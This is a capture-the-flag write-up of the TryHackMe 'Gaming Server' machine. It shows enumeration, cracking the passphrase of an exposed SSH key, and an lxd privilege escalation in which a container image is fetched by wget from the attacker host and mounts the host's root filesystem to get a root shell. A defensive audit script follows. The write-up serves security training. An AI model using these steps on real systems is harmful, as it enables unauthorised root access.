
Gaming Server Writeup [THM]

Gaming Server is an easy boot2root Linux machine from TryHackMe. It consists of obtaining an encrypted RSA private key, cracking its passphrase to gain SSH access, and then abusing lxd group membership to obtain root.

Enumeration

Running nmap:

```text
# Nmap 7.80 scan initiated Mon Aug 31 13:11:04 2020 as: nmap -sC -sV -o nmap.txt 10.10.52.248
Nmap scan report for 10.10.52.248
Host is up (0.041s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 34:0e:fe:06:12:67:3e:a4:eb:ab:7a:c4:81:6d:fe:a9 (RSA)
|   256 49:61:1e:f4:52:6e:7b:29:98:db:30:2d:16:ed:f4:8b (ECDSA)
|_  256 b8:60:c4:5b:b7:b2:d0:23:a0:c7:56:59:5c:63:1e:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: House of danak
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Browsing to port 80 we find a static web page titled "House of danak".

Inspecting the page source reveals a comment that points to a possible user named john:

```html
</body>
<!-- john, please add some actual content to the site! lorem ipsum is horrible to look at. -->
</html>
```

We run gobuster in order to enumerate web directories:

```bash
gobuster dir -u 10.10.141.219 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/uploads (Status: 301)
/secret (Status: 301)
```

Browsing to /secret we find an encrypted id_rsa private key named secretKey.

It can be downloaded with wget:

```bash
wget http://10.10.141.219/secret/secretKey
```

Exploitation

ssh2john converts the encrypted key into a hash that John can crack:

```bash
/usr/share/john/ssh2john.py secretKey > hash.txt
```

Now the obtained hash can be cracked using John:

```text
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
*****[redacted]          (secretKey)
```

With the recovered passphrase we can log in over SSH as john:

```bash
chmod 600 secretKey
ssh john@10.10.141.219 -i secretKey
john@exploitable:~$ id
uid=1000(john) gid=1000(john) groups=1000(john),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
```

Privilege Escalation

Checking the output of the id command, we see that john is a member of the lxd group. Members of this group can create privileged containers that mount the host filesystem, which can be abused to obtain root.

First we download and build an Alpine image on the attacking machine:

```bash
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
./build-alpine -a i686
```

The image can then be transferred by serving it with a Python HTTP server:

```bash
python -m SimpleHTTPServer 80
```

On the victim machine:

```text
john@exploitable:~$ wget http://10.11.14.106/alpine-v3.12-i686-20200831_1433.tar.gz
Connecting to 10.11.14.106:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3197374 (3.0M) [application/gzip]
Saving to: ‘alpine-v3.12-i686-20200831_1433.tar.gz’
```

Then we import the image, create a privileged container from it and attach the host's root filesystem (/) at /mnt/root inside the container:

```text
john@exploitable:~$ lxc image import ./alpine-v3.12-i686-20200831_1433.tar.gz --alias myimage
Image imported with fingerprint: 8600391e0acff5b341e213ce0638b5eefb1839d457d57bed31f9ead44d7315a9
john@exploitable:~$ lxc init myimage mycontainer -c security.privileged=true
Creating mycontainer
john@exploitable:~$ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true
Device mydevice added to mycontainer
```

Now we can start the container and spawn a shell in it:

```text
john@exploitable:~$ lxc start mycontainer
john@exploitable:~$ lxc exec mycontainer /bin/sh
~ # id
uid=0(root) gid=0(root)
```

Finally, the host's files are reachable under /mnt/root inside the container, where we can cat the flag:

```text
~ # cat /mnt/root/root/root.txt
2*************0****************c [redacted]
```
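As an added defender's check (not part of the original writeup), the script below audits the two conditions this box chains together: membership of the lxd group in /etc/group, and a container that is both privileged and has the host's / attached as a disk device. The /etc/group excerpt and the `lxc config show` output are constructed samples, and the container name is hypothetical.

```shell
#!/bin/sh
# Constructed /etc/group excerpt; on a real host feed it the output of: cat /etc/group
SAMPLE_GROUP='root:x:0:
adm:x:4:syslog,john
sudo:x:27:john
lxd:x:108:john
docker:x:999:
alice:x:1001:'

# Constructed "lxc config show <container>" output for a hypothetical container
SAMPLE_LXC_CONFIG='architecture: i686
config:
  security.privileged: "true"
devices:
  mydevice:
    path: /mnt/root
    source: /
    type: disk'

# Groups whose membership is effectively root on a stock Ubuntu install
RISKY_GROUPS="lxd docker sudo adm disk"

# Print "group:user" for every member of a risky group. $1: /etc/group text.
risky_members() {
    printf '%s\n' "$1" | awk -F: -v risky="$RISKY_GROUPS" '
        BEGIN { split(risky, r, " "); for (i in r) want[r[i]] = 1 }
        ($1 in want) && $4 != "" {
            n = split($4, m, ",")
            for (i = 1; i <= n; i++) print $1 ":" m[i]
        }'
}

# Succeed (exit 0) when user $2 is a member of risky group $1 in text $3.
is_member() {
    risky_members "$3" | grep -qx "$1:$2"
}

# Print one finding per line for a container config. $1: lxc config show text.
# PRIVILEGED: uid 0 inside the container maps to uid 0 on the host.
# HOST_ROOT_MOUNTED: a disk device whose source is the host's /.
container_findings() {
    printf '%s\n' "$1" | awk '
        /^[ \t]*security\.privileged:.*true/   { print "PRIVILEGED" }
        /^[ \t]*source:[ \t]*\/[ \t]*$/        { print "HOST_ROOT_MOUNTED" }'
}

# Stand-alone run: report on the constructed samples.
risky_members "$SAMPLE_GROUP"
container_findings "$SAMPLE_LXC_CONFIG"
```

On a live host, pipe `cat /etc/group` and `lxc config show <name>` into the two functions; any user listed under lxd who is not an administrator, or any container that prints both findings, deserves a look.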
This post is licensed under CC BY 4.0 by the author.